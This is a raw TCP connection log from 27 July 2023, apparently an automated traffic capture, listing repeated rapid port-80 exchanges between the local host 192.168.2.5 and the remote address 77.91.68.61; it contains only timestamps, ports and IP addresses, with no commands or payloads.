Jul 27, 2023 01:35:14.287409067 CEST	50210	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.288553953 CEST	50211	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.332461119 CEST	80	50210	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.333482027 CEST	80	50211	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.333564997 CEST	50210	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.333622932 CEST	50211	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.334136009 CEST	50211	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.379733086 CEST	80	50211	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.383183956 CEST	80	50211	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.384855986 CEST	50211	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.513670921 CEST	50211	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.516516924 CEST	50212	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.558613062 CEST	80	50211	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.559478998 CEST	50211	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.561851025 CEST	80	50212	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.561996937 CEST	50212	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.562799931 CEST	50212	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.607332945 CEST	80	50212	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.611393929 CEST	80	50212	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.611511946 CEST	50212	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.751950979 CEST	50212	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.754426003 CEST	50213	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.796731949 CEST	80	50212	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.799151897 CEST	80	50213	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.799206972 CEST	50212	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.799280882 CEST	50213	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.885268927 CEST	50213	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:14.930278063 CEST	80	50213	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.934859037 CEST	80	50213	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:14.934957027 CEST	50213	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.056580067 CEST	50213	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.059320927 CEST	50214	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.101439953 CEST	80	50213	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.102389097 CEST	50213	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.104739904 CEST	80	50214	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.104832888 CEST	50214	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.105412006 CEST	50214	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.150588989 CEST	80	50214	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.160381079 CEST	80	50214	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.160733938 CEST	50214	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.271001101 CEST	50214	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.271823883 CEST	50215	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.315463066 CEST	80	50214	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.315574884 CEST	50214	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.315927982 CEST	80	50215	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.316245079 CEST	50215	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.317004919 CEST	50215	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.361351013 CEST	80	50215	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.365550041 CEST	80	50215	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.366417885 CEST	50215	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.507056952 CEST	50215	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.508027077 CEST	50216	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.551554918 CEST	80	50215	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.552303076 CEST	50215	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.552495003 CEST	80	50216	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.555104971 CEST	50216	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.555635929 CEST	50216	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.600011110 CEST	80	50216	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.603857994 CEST	80	50216	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.604007959 CEST	50216	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.746862888 CEST	50217	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.753319979 CEST	50216	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.791657925 CEST	80	50217	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.791750908 CEST	50217	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.792558908 CEST	50217	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.797769070 CEST	80	50216	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.797852993 CEST	50216	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.837296009 CEST	80	50217	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.840420961 CEST	80	50217	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:15.842123985 CEST	50217	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.957453012 CEST	50217	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:15.958268881 CEST	50218	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.002461910 CEST	80	50217	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.002852917 CEST	80	50218	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.002917051 CEST	50217	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.002960920 CEST	50218	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.004581928 CEST	50218	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.049422026 CEST	80	50218	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.052227020 CEST	80	50218	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.052289009 CEST	50218	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.172035933 CEST	50218	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.173065901 CEST	50219	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.216912985 CEST	80	50218	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.217348099 CEST	50218	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.217701912 CEST	80	50219	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.217781067 CEST	50219	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.224113941 CEST	50219	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.268954039 CEST	80	50219	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.271666050 CEST	80	50219	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.272245884 CEST	50219	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.385659933 CEST	50219	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.386471987 CEST	50220	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.430336952 CEST	80	50219	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.430685997 CEST	80	50220	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.430754900 CEST	50219	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.430794954 CEST	50220	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.431197882 CEST	50220	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.475373030 CEST	80	50220	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.479111910 CEST	80	50220	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.479269981 CEST	50220	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.597769976 CEST	50220	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.598603010 CEST	50221	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.642452002 CEST	80	50220	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.642744064 CEST	50220	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.642786980 CEST	80	50221	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.642857075 CEST	50221	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.647319078 CEST	50221	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.692924976 CEST	80	50221	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.695178986 CEST	80	50221	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.697108984 CEST	50221	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.800086021 CEST	50221	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.840609074 CEST	50222	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.844393015 CEST	80	50221	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.844470978 CEST	50221	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.885668039 CEST	80	50222	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.886209011 CEST	50222	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.899893999 CEST	50222	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:16.945904970 CEST	80	50222	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.950027943 CEST	80	50222	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:16.951284885 CEST	50222	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.065880060 CEST	50222	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.067895889 CEST	50223	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.110316038 CEST	80	50222	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.112406969 CEST	80	50223	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.114234924 CEST	50222	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.114326954 CEST	50223	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.130358934 CEST	50223	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.174195051 CEST	80	50223	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.177813053 CEST	80	50223	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.178371906 CEST	50223	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.284399033 CEST	50223	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.285278082 CEST	50224	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.328638077 CEST	80	50223	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.328697920 CEST	50223	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.329272985 CEST	80	50224	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.331229925 CEST	50224	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.332315922 CEST	50224	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.376290083 CEST	80	50224	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.379502058 CEST	80	50224	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.379822016 CEST	50224	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.496340990 CEST	50224	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.496992111 CEST	50225	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.540520906 CEST	80	50224	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.541341066 CEST	80	50225	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.541387081 CEST	50224	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.541460991 CEST	50225	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.541857004 CEST	50225	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.586256981 CEST	80	50225	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.589888096 CEST	80	50225	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.590403080 CEST	50225	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.706800938 CEST	50225	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.708028078 CEST	50226	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.751446009 CEST	80	50225	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.751564980 CEST	50225	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.752656937 CEST	80	50226	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.752774954 CEST	50226	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.765944004 CEST	50226	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.811019897 CEST	80	50226	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.814007044 CEST	80	50226	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.814095020 CEST	50226	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.929634094 CEST	50226	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.930777073 CEST	50227	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.976480007 CEST	80	50226	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.976571083 CEST	50226	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.978291988 CEST	80	50227	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:17.978399038 CEST	50227	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:17.978847027 CEST	50227	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.023243904 CEST	80	50227	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.027101040 CEST	80	50227	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.027201891 CEST	50227	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.144284010 CEST	50227	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.144982100 CEST	50228	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.188898087 CEST	80	50227	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.189064026 CEST	50227	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.189759016 CEST	80	50228	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.189870119 CEST	50228	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.195631027 CEST	50228	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.242340088 CEST	80	50228	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.245976925 CEST	80	50228	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.246074915 CEST	50228	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.378350019 CEST	50228	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.379025936 CEST	50229	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.423171997 CEST	80	50228	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.423259020 CEST	80	50229	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.423257113 CEST	50228	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.423340082 CEST	50229	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.424273014 CEST	50229	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.468584061 CEST	80	50229	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.472374916 CEST	80	50229	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.472467899 CEST	50229	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.597542048 CEST	50229	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.598589897 CEST	50230	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.641922951 CEST	80	50229	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.642034054 CEST	50229	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.642967939 CEST	80	50230	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.643102884 CEST	50230	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.643733978 CEST	50230	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.688596010 CEST	80	50230	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.692344904 CEST	80	50230	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.692418098 CEST	50230	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.800813913 CEST	50230	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.822374105 CEST	50231	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.845647097 CEST	80	50230	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.845724106 CEST	50230	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.867299080 CEST	80	50231	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.867404938 CEST	50231	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.870064974 CEST	50231	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:18.915023088 CEST	80	50231	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.918440104 CEST	80	50231	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:18.918514967 CEST	50231	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.037144899 CEST	50231	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.037986994 CEST	50232	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.081707954 CEST	80	50231	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.081784964 CEST	50231	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.082839966 CEST	80	50232	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.082918882 CEST	50232	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.084121943 CEST	50232	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.128663063 CEST	80	50232	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.132457972 CEST	80	50232	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.132582903 CEST	50232	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.260739088 CEST	50232	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.261599064 CEST	50233	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.305676937 CEST	80	50232	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.305759907 CEST	50232	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.306323051 CEST	80	50233	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.306401968 CEST	50233	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.334778070 CEST	50233	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.379427910 CEST	80	50233	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.382735014 CEST	80	50233	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.382812977 CEST	50233	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.503590107 CEST	50233	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.504508972 CEST	50234	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.548166990 CEST	80	50233	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.548274040 CEST	50233	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.549093008 CEST	80	50234	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.549223900 CEST	50234	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.549849033 CEST	50234	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.594120026 CEST	80	50234	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.597611904 CEST	80	50234	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.597704887 CEST	50234	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.706218004 CEST	50234	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.706897974 CEST	50235	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.750597000 CEST	80	50234	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.750679970 CEST	50234	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.751171112 CEST	80	50235	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.751247883 CEST	50235	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.751789093 CEST	50235	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.795785904 CEST	80	50235	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.799609900 CEST	80	50235	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.799690962 CEST	50235	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.921778917 CEST	50235	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.922772884 CEST	50236	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.971529961 CEST	80	50235	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.971570969 CEST	80	50236	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:19.971671104 CEST	50235	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.971724033 CEST	50236	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:19.994446993 CEST	50236	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.039654970 CEST	80	50236	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.042469025 CEST	80	50236	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.042614937 CEST	50236	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.159703970 CEST	50236	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.160567999 CEST	50237	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.204495907 CEST	80	50236	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.204889059 CEST	50236	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.205147028 CEST	80	50237	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.205302954 CEST	50237	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.206727982 CEST	50237	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.252670050 CEST	80	50237	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.255670071 CEST	80	50237	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.257688999 CEST	50237	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.368340015 CEST	50237	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.369352102 CEST	50238	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.415004969 CEST	80	50237	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.415035963 CEST	80	50238	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.415121078 CEST	50237	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.415162086 CEST	50238	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.418353081 CEST	50238	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.465234995 CEST	80	50238	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.468615055 CEST	80	50238	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.468697071 CEST	50238	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.582160950 CEST	50238	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.583014965 CEST	50239	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.628667116 CEST	80	50238	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.628695011 CEST	80	50239	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.628778934 CEST	50238	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.628814936 CEST	50239	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.639779091 CEST	50239	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.684689999 CEST	80	50239	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.688613892 CEST	80	50239	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.690609932 CEST	50239	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.800736904 CEST	50239	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.828388929 CEST	50240	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.850796938 CEST	80	50239	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.850858927 CEST	50239	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.874752045 CEST	80	50240	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.876506090 CEST	50240	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.887074947 CEST	50240	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:20.932476044 CEST	80	50240	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.938298941 CEST	80	50240	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:20.938957930 CEST	50240	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.060425043 CEST	50240	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.061712980 CEST	50241	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.107954025 CEST	80	50240	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.107985973 CEST	80	50241	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.108036995 CEST	50240	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.108083010 CEST	50241	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.108525991 CEST	50241	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.156399012 CEST	80	50241	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.160372019 CEST	80	50241	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.161272049 CEST	50241	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.270342112 CEST	50241	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.271842003 CEST	50242	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.318718910 CEST	80	50241	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.318751097 CEST	80	50242	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.318831921 CEST	50241	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.318896055 CEST	50242	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.341850996 CEST	50242	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.386744022 CEST	80	50242	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.390665054 CEST	80	50242	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.390927076 CEST	50242	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.512221098 CEST	50242	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.519414902 CEST	50243	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.557744026 CEST	80	50242	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.557815075 CEST	50242	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.564614058 CEST	80	50243	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.565521002 CEST	50243	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.581129074 CEST	50243	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.625319958 CEST	80	50243	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.629724026 CEST	80	50243	77.91.68.61	192.168.2.5
Jul 27, 2023 01:35:21.629820108 CEST	50243	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.747829914 CEST	50243	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.748668909 CEST	50244	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:35:21.791975021 CEST	80	50243	77.91.68.61	192.168.2.5
